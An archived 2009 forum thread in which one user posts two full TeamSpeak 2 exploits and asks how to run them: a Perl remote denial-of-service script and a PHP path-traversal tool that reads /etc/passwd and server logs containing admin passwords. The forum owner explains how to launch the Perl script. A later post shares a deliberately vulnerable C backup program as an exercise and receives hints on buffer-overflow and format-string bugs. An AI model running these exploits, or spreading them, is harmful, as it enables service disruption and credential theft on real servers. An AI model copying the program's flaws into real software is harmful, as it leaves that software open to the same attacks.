Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 14:57

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 4 posts ] 
Author Message
 Post subject: help with exploits
PostPosted: 11 Jul 2009 18:22 

Joined: 11 Jul 2009 07:16
Posts: 3
i have two exploits for teamspeak, but i dont understood how it works
what the command line in dos for i use these exploits?
Code:
#!/usr/bin/perl

# TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha (skyhole [at] gmail.com)
# Vendor URL: http://www.goteamspeak.com/
# TeamSpeak WebServer has no tcp session expire and no checks for incoming values length.
# TODO:
# Edit $target value
# Run script
# CPU 100%, Memory up for 1.2 Gb per one attack session.
# Greetz: str0ke & milw0rm proj

use IO::Socket;

$target = 'xxx.xxx.xxx.xxx';
$port_tcp=14534;

$buffer_ascii= 'A' x 0xc00000;
$buffer_dig= '659090';
$req = "username\=$buffer_ascii\&password\=$buffer_ascii\&serverport\=$buffer_dig\&submit\=Login";
$uagent = 'Mozilla 5.0';
my $res;
my $tmp;

    print "\nStarting D0S\n\n";
    my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"$port_tcp") or die "\n Could not connect to host\n\n";

    print $sock "POST /login.tscmd HTTP/1.1\r\n";
    print $sock "Host: ".$target."\r\n";
    print $sock "User-Agent: ".$uagent."\r\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
    print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    print $sock "Accept-Encoding: gzip,deflate\r\n";
    print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Referer: http://".$target."/slogin.html\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Content-Length: ".length($req)."\r\n\r\n";
    print $sock $req;
    print $sock "\n";
   
   while ( $res = <$sock> ) {
   $tmp.= $res;   
    }
    print $tmp;
    close($sock);

# milw0rm.com [2007-07-20]

-----
Code:
<?php
// teamspeak server <= 2.0.23.17 remote read file vulnerability
// bug found and exploit write by c411k
// http://www.heise-online.co.uk/security/Vulnerability-in-TeamSpeak-2-server--/news/93734 zazhali ploent svolo4i!!
// tested on win ts2_server_rc2_202317, ts2_server_rc2_20201.exe
// grats all https://forum.antichat.ru
// use http://localhost/ts_xek.php
// 10.01.09

error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);

header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");

function check_ver($site, $xek, $port)
{
   $url = fsockopen("$site", "$port", $errno, $errstr, 22);
   $send_pac = "$xek\r\n\r\n";
   fputs($url, $send_pac);
   $s = '';
   
   while (!feof($url) and strpos(implode($s), 'OK') === false)
   {
      $s[] = fgets($url, 1028);
   }
   fclose($url);
   return implode($s);
}

function html()
{
   if (isset($_POST['file']))
      $file = $_POST['file'];
   else $file = '../../../../../etc/passwd';
   echo
   '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post">
   <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="parampampam" type="submit" value="&#8194;read file...&#8194;">
   <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="check_ver" type="submit" value="&#8194;check_version&#8194;"><br>
   <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD">&#8194;&#172; teamspeak hostname or ip, for expamle "ts.antichat.ru"
   <input style="background-color: #31333B; color: #B9B9BD;" name="port" value="51234"><font color="#B9B9BD">&#8194;&#172; port to TCQquery admin, default 51234
   <input style="background-color: #31333B; color: #B9B9BD;" name="file" value="'.$file.'"><font color="#B9B9BD">&#8194;&#172; file to read.';
}

function info()
{
   echo
   '<br>
   for example:
   server.log
   server.dbs
   ../../../../../boot.ini
   ../../../../../etc/passwd
   ../../../../../usr/local/apache/conf/httpd.conf etc.
   brain on ;)
   
   admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files.
   
   <textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>---------------------------------------------------------------
-------------- log started at 10-01-09 00:24 -------------
---------------------------------------------------------------
10-01-09 00:24:28,ALL,Info,server,   Server init initialized
10-01-09 00:24:28,ALL,Info,server,   Server version: 2.0.20.1 Win32
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_servers
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_server_privileges
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_channels
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_channel_privileges
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_clients
10-01-09 00:24:28,WARNING,Info,SQL,   created table ts2_bans
10-01-09 00:24:28,ALL,Info,server,   Starting VirtualServer id:1 with port:8767
10-01-09 00:24:28,WARNING,Info,SERVER,   Default VirtualServer created
10-01-09 00:24:28,WARNING,Info,SERVER,   admin account info: username: admin password: kcqy8y
10-01-09 00:24:28,WARNING,Info,SERVER,   superadmin account info: username: superadmin password: e7em45
10-01-09 00:24:29,ALL,Info,server,   Server init finished</textarea></form>';
}

function head()
{
   echo '<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>xek_teamspeak2</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
   margin="5";
   FONT-WEIGHT: normal;
   COLOR: #B9B9BD;
   BACKGROUND: #44474F;
   FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
}

-->
</style>
</head>
<body>';
}

head();

if (!$_GET)
{
   html();
   info();
}

if (isset($_GET['go_fuck']))
{
   $hostname = $_POST['hostname'];
   $file = $_POST['file'];
   $port = $_POST['port'];
   
   if (isset($_POST['check_ver']))
   {
      echo '<pre>'.check_ver($hostname, 'ver', $port);
      
   }
   
   if (isset($_POST['parampampam']))
   {
      echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';
      html();
      
   }
}

?>

# milw0rm.com [2009-01-14]


Top
 Profile  
 
 
 Post subject: Re: help with exploits
PostPosted: 11 Jul 2009 18:33 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the first code is made in perl and you need to modify the $target variable and then launching perl: perl file.pl

the second one is totally useless.
that one is the bug about which I talked one year before that person in the following post:
post1677.html#p1677
it's enough netcat or even telnet connected to the port 51234 of the server for testing it


Top
 Profile  
 
 Post subject: Re: help with exploits
PostPosted: 19 Sep 2009 08:06 

Joined: 16 Sep 2009 07:19
Posts: 1
I am new to computer security. I am trying some exercises given by my friends. But they failed to provide the good answers for me, so I hope I could seek help from you guys.

Here is a backup/restore program, I was told that there must be at least five (or seven??) vulnerabilities inside and they could be exploited, could anyone tell me how to find the vulnerabilities and how I could exploit them?

It would be greatly appreciated if anyone could give me two examples to show how to exploit them. I would really like to try the rest by my own.

Thanks a lot in advance!


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/wait.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>

#define CMD_BACKUP 0
#define CMD_RESTORE 1

#define BACKUP_DIRECTORY "/usr/share/backup"
#define FORBIDDEN_DIRECTORY "/etc"

static
int copyFile(char* src, char* dst)
{
char buffer[1024];
unsigned int i, len;
FILE *source, *dest;
int c;

source = fopen(src, "r");
if (source == NULL) {
fprintf(stderr, "Failed to open source file\n");
return -1;
}

i = 0;
c = fgetc(source);
while (c != EOF) {
buffer[i] = (unsigned char) c;
c = fgetc(source);
i++;
}

len = i;
fclose(source);

dest = fopen(dst, "w");
if (dest == NULL) {
fprintf(stderr, "Failed to open destination file\n");
return -1;
}

for(i = 0; i < len; i++)
fputc(buffer[i], dest);

fclose(dest);

return 0;
}

static
int restorePermissions(char* target)
{
pid_t pid;
int status;
char *user, *userid, *ptr;
FILE *file;
char buffer[64];
mode_t mode;

// execute "chown" to assign file ownership to user
pid = fork();

// error
if (pid < 0) {
fprintf(stderr, "Fork failed\n");
return -1;
}

// parent
if (pid > 0) {
waitpid(pid, &status, 0);
if (WIFEXITED(status) == 0 || WEXITSTATUS(status) < 0)
return -1;
}
else {

// child
// retrieve username
user = getenv("USER");
// retrieve corresponding userid
file = fopen("/etc/passwd", "r");
if (file == NULL) {
fprintf(stderr, "Failed to open password file\n");
return -1;
}
userid = NULL;
while (!feof(file)) {
if (fgets(buffer, sizeof(buffer), file) != NULL) {
ptr = strtok(buffer, ":");
if (strcmp(ptr, user) == 0) {
strtok(NULL, ":"); // password
userid = strtok(NULL, ":"); // userid
ptr = strtok(NULL, ":"); // group
*ptr = '\0';
break;
}
}
}

if (userid != NULL)
execlp("chown", "chown", userid, target, NULL);

// reached only in case of error
return -1;
}

mode = S_IRUSR | S_IWUSR | S_IEXEC;
chmod(target, mode);

return 0;
}

static
void usage(char* parameter)
{
char output[128];
char buffer[128];

snprintf(buffer, sizeof(buffer), "Usage: %.88s backup|restore pathname\n",
parameter);
sprintf(output, buffer);
printf(output);
}

int main(int argc, char* argv[])
{
int cmd;
char *path, *ptr;
char *forbidden = FORBIDDEN_DIRECTORY;
char *src, *dst, *buffer;

if (argc != 3) {
usage(argv[0]);
return 1;
}

if (strcmp("backup", argv[1]) == 0) {
cmd = CMD_BACKUP;
}
else if (strcmp("restore", argv[1]) == 0) {
cmd = CMD_RESTORE;
} else {
usage(argv[0]);
return 1;
}

path = argv[2];

// prevent access to forbidden directory
ptr = realpath(path, NULL);
if (ptr != NULL && strstr(ptr, forbidden) == ptr) {
fprintf(stderr, "Not allowed to access target/source %s\n", path);
return 1;
}

// set up paths for copy operation
buffer = malloc(strlen(BACKUP_DIRECTORY) + 1 + strlen(path) + 1);
if (buffer == NULL) {
fprintf(stderr, "Failed to allocate memory\n");
return 1;
}

if (cmd == CMD_BACKUP) {
src = path;

dst = buffer;
strcpy(dst, BACKUP_DIRECTORY);
strcat(dst, "/");
strcat(dst, path);
}
else {
src = buffer;
strcpy(src, BACKUP_DIRECTORY);
strcat(src, "/");
strcat(src, path);

dst = path;
}

// perform actual backup/restore operation
if (copyFile(src, dst) < 0)
return 1;

// grant user access to restored file
if (cmd == CMD_RESTORE) {
if (restorePermissions(path) < 0)
return 1;
}

return 0;


live chat support


Top
 Profile  
 
 Post subject: Re: help with exploits
PostPosted: 19 Sep 2009 12:22 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the first type of bug you must look at is the buffer-overflow, so you must check any field where happens the copy of data from an input to a buffer.
this can happen with a copy byte-per-byte from a file, or with a sprintf, or with the appending of a string to the buffer (for example with strcat).
and obviously don't forget the format string bugs.
that's enough for the moment.

anyway I don't like to waste time on these things, so please refer to this section only for real programming problems.


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 4 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: